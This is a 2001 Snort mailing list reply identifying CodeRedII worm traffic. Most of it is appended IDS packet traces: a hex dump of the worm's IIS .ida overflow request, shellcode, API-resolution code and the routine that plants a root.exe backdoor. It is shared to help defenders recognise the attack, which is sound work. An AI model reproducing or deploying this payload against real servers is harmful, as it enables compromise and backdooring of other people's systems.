Snort mailing list archives
Re: A new variation of CodeRed???????????
From: Neil Dickey <neil () geol niu edu>
Date: Thu, 16 Aug 2001 10:46:16 -0500 (CDT)
"John Davey" <john () davey net au> wrote asking:
Does any one know anything about this or has seen it before?
What you forwarded looks just like what I've been calling CodeRedII. It's the one with the backdoor. The original CodeRed used "N" for the filler instead of "X". I forget where I originally read about it, probably BugTraq. ;-)
I just got hit 70 times in 6 minutes.
Yup, seen it here *many* times. I hope you weren't vulnerable. I've appended the full packet trace if you're interested. Note the imbedded "CodeRedII" string. Best regards, Neil Dickey, Ph.D. Research Associate/Sysop Geology Department Northern Illinois University DeKalb, Illinois 60115 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [**] WEB-IIS ISAPI .ida attempt [**] 08/16-00:47:24.035816 131.94.167.24:1352 -> 131.156.X.X:80 TCP TTL:105 TOS:0x0 ID:26029 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0xD8C25DE7 Ack: 0xE988E5FF Win: 0x4470 TcpLen: 20 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 ?XXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 X%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078% 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F ype: text/xml.Co 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33 ntent-length: 33 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00 79 ........`.... 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00 ....dg.6..dg.&.. E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF .....h......\... 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40 P.U...\...P.U..@ 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00 .....X....U.=... 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6 ....=........... C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00 ...T....u..~0... 00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A ........F0...... 00 00 00 43 6F 64 65 52 65 64 49 49 00 8B 1C 24 ...CodeRedII...$ FF 55 D8 66 0B C0 0F 95 85 38 FE FF FF C7 85 50 .U.f.....8.....P FE FF FF 01 00 00 00 6A 00 8D 85 50 FE FF FF 50 .......j...P...P 8D 85 38 FE FF FF 50 8B 45 08 FF 70 08 FF 90 84 ..8...P.E..p.... 00 00 00 80 BD 38 FE FF FF 01 74 68 53 FF 55 D4 .....8....thS.U. FF 55 EC 01 45 84 69 BD 54 FE FF FF 2C 01 00 00 .U..E.i.T...,... 81 C7 2C 01 00 00 E8 D2 04 00 00 F7 D0 0F AF C7 ..,............. 89 46 34 8D 45 88 50 6A 00 FF 75 08 E8 05 00 00 .F4.E.Pj..u..... 00 E9 01 FF FF FF 6A 00 6A 00 FF 55 F0 50 FF 55 ......j.j..U.P.U D0 4F 75 D2 E8 3B 05 00 00 69 BD 54 FE FF FF 00 .Ou..;...i.T.... 5C 26 05 81 C7 00 5C 26 05 57 FF 55 E8 6A 00 6A \&....\&.W.U.j.j 16 FF 55 8C 6A FF FF 55 E8 EB F9 8B 46 34 29 45 ..U.j..U....F4)E 84 6A 64 FF 55 E8 8D 85 3C FE FF FF 50 FF 55 C0 .jd.U...<...P.U. 0F B7 85 3C FE FF FF 3D D2 07 00 00 73 CF 0F B7 ...<...=....s... 85 3E FE FF FF 83 F8 0A 73 C3 66 C7 85 70 FF FF .>......s.f..p.. FF 02 00 66 C7 85 72 FF FF FF 00 50 E8 64 04 00 ...f..r....P.d.. 00 89 9D 74 FF FF FF 6A 00 6A 01 6A 02 FF 55 B8 ...t...j.j.j..U. 83 F8 FF 74 F2 89 45 80 6A 01 54 68 7E 66 04 80 ...t..E.j.Th~f.. FF 75 80 FF 55 A4 59 6A 10 8D 85 70 FF FF FF 50 .u..U.Yj...p...P FF 75 80 FF 55 B0 BB 01 00 00 00 0B C0 74 4B 33 .u..U........tK3 DB FF 55 94 3D 33 27 00 00 75 3F C7 85 68 FF FF ..U.=3'..u?..h.. FF 0A 00 00 00 C7 85 6C FF FF FF 00 00 00 00 C7 .......l........ 85 60 FF FF FF 01 00 00 00 8B 45 80 89 85 64 FF .`........E...d. FF FF 8D 85 68 FF FF FF 50 6A 00 8D 85 60 FF FF ....h...Pj...`.. FF 50 6A 00 6A 01 FF 55 A0 93 6A 00 54 68 7E 66 .Pj.j..U..j.Th~f 04 80 FF 75 80 FF 55 A4 59 83 FB 01 75 31 E8 00 ...u..U.Y...u1.. 00 00 00 58 2D D3 03 00 00 6A 00 68 EA 0E 00 00 ...X-....j.h.... 50 FF 75 80 FF 55 AC 3D EA 0E 00 00 75 11 6A 00 P.u..U.=....u.j. 6A 01 8D 85 5C FE FF FF 50 FF 75 80 FF 55 A8 FF j...\...P.u..U.. 75 80 FF 55 B4 E9 E7 FE FF FF BB 00 00 DF 77 81 u..U..........w. C3 00 00 01 00 81 FB 00 00 00 78 75 05 BB 00 00 ..........xu.... F0 BF 60 E8 0E 00 00 00 8B 64 24 08 64 67 8F 06 ..`......d$.dg.. 00 00 58 61 EB D9 64 67 FF 36 00 00 64 67 89 26 ..Xa..dg.6..dg.& 00 00 66 81 3B 4D 5A 75 E3 8B 4B 3C 81 3C 0B 50 ..f.;MZu..K<.<.P 45 00 00 75 D7 8B 54 0B 78 03 D3 8B 42 0C 81 3C E..u..T.x...B..< 03 4B 45 52 4E 75 C5 81 7C 03 04 45 4C 33 32 75 .KERNu..|..EL32u BB 33 C9 49 8B 72 20 03 F3 FC 41 AD 81 3C 03 47 .3.I.r ...A..<.G 65 74 50 75 F5 81 7C 03 04 72 6F 63 41 75 EB 03 etPu..|..rocAu.. 4A 10 49 D1 E1 03 4A 24 0F B7 0C 0B C1 E1 02 03 J.I...J$........ 4A 1C 8B 04 0B 03 C3 89 44 24 24 64 67 8F 06 00 J.......D$$dg... 00 58 61 C3 E8 51 FF FF FF 89 5D FC 89 45 F8 E8 .Xa..Q....]..E.. 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 ....LoadLibraryA 00 FF 75 FC FF 55 F8 89 45 F4 E8 0D 00 00 00 43 ..u..U..E......C 72 65 61 74 65 54 68 72 65 61 64 00 FF 75 FC FF reateThread..u.. 55 F8 89 45 F0 E8 0D 00 00 00 47 65 74 54 69 63 U..E......GetTic 6B 43 6F 75 6E 74 00 FF 75 FC FF 55 F8 89 45 EC kCount..u..U..E. E8 06 00 00 00 53 6C 65 65 70 00 FF 75 FC FF 55 .....Sleep..u..U F8 89 45 E8 E8 17 00 00 00 47 65 74 53 79 73 74 ..E......GetSyst 65 6D 44 65 66 61 75 6C 74 4C 61 6E 67 49 44 00 emDefaultLangID. FF 75 FC FF 55 F8 89 45 E4 E8 14 00 00 00 47 65 .u..U..E......Ge 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 tSystemDirectory 41 00 FF 75 FC FF 55 F8 89 45 E0 E8 0A 00 00 00 A..u..U..E...... 43 6F 70 79 46 69 6C 65 41 00 FF 75 FC FF 55 F8 CopyFileA..u..U. 89 45 DC E8 10 00 00 00 47 6C 6F 62 61 6C 46 69 .E......GlobalFi 6E 64 41 74 6F 6D 41 00 FF 75 FC FF 55 F8 89 45 ndAtomA..u..U..E D8 E8 0F 00 00 00 47 6C 6F 62 61 6C 41 64 64 41 ......GlobalAddA 74 6F 6D 41 tomA =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [**] WEB-IIS cmd.exe access [**] 08/16-00:47:24.038189 131.94.167.24:1352 -> 131.156.X.X:80 TCP TTL:105 TOS:0x0 ID:26030 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0xD8C2639B Ack: 0xE988E5FF Win: 0x4470 TcpLen: 20 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 ..u..U..E......C 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 loseHandle..u..U F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74 ..E......_lcreat 00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F ..u..U..E......_ 6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8 lwrite..u..U..E. E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC ....._lclose..u. FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79 .U..E......GetSy 73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89 stemTime..u..U.. 45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C E......WS2_32.DL 4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63 L..U..E......soc 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 ket..u..U..E.... 00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75 ..closesocket..u BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74 ..U..E......ioct 6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 lsocket..u..U..E A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75 ......connect..u BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65 ..U..E......sele 63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00 ct..u..U..E..... 00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8 .send..u..U..E.. 05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89 ....recv..u..U.. 45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61 E......gethostna 6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00 me..u..U..E..... 00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF .gethostbyname.. 75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41 u..U..E......WSA 47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC GetLastError..u. FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33 .U..E......USER3 32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 2.DLL..U..E..... 00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF .ExitWindowsEx.. 75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84 u..U..E...E.i... 08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1 ..@.E....xV4.... C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 ........<.t.<.t. C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 ................ E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 ................ E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF ......... ...... FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF ................ FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04 .............Y.. 81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F .#...#.X........ 74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 t....t.;.X...t.. 68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D h......\...P.U.. BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E ..\........\CMD. 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 EXE.^.....cj.... 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 ..d:\inetpub\scr 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C ipts\root.exe... 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 $....\...P.U.j.. 2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C +...d:\progra~1\ 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C common~1\system\ 4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B MSADC\root.exe.. 0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA .$....\...P.U... 05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00 ....MZP......... FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC ............@... 00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C ...........PE..L 01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0 ....*%)......... 00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00 ................ 00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00 ............ ... 00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00 .@.............. 00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00 ............@... 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 ................ 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 ............... 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C ............0... 01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 ................ 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 .......... ..`.. 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04 ........... .... 00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10 ..@............. 00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00 ...0............ 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC ..........@..... FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68 ..........h....h D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE . @..a...... @.. 00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 . @.....j.h. @.. 4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31 L........h.'...1 01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A .....h.$@.h?...j 00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00 .h. @.h.....2... 0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68 ..u&j.hT @.j.j.h 48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF H @..5.$@....... 35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68 5.$@......h.$@.h 3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80 ?...j.hX @.h.... E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C .......uU.. @..L 00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68 ..... @..B...j.h B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 . @.j.j.h. @..5. 24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A $@......j.h. @.j 01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99 .j.h. @..5.$@... 00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 ....5.$@........ 05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0 ..$@.....h.$@.h. 20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40 @.h.$@.j.U.5.$@ 00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B ..`.....uI..$@.. C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81 .t@.. @..>.t6Ff. 7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20 ~.,,u...217.... 40 00 89 35 @..5 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: http://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- A new variation of CodeRed??????????? John Davey (Aug 16)
- <Possible follow-ups>
- Re: A new variation of CodeRed??????????? Neil Dickey (Aug 16)
- RE: A new variation of CodeRed??????????? John Davey (Aug 16)
- MD5 sums for each CodeRed version (was "A new variation of CodeRed???????????") Stephen W. Thompson (Aug 16)
- RE: A new variation of CodeRed??????????? John Davey (Aug 16)
- RE: A new variation of CodeRed??????????? Neil Dickey (Aug 16)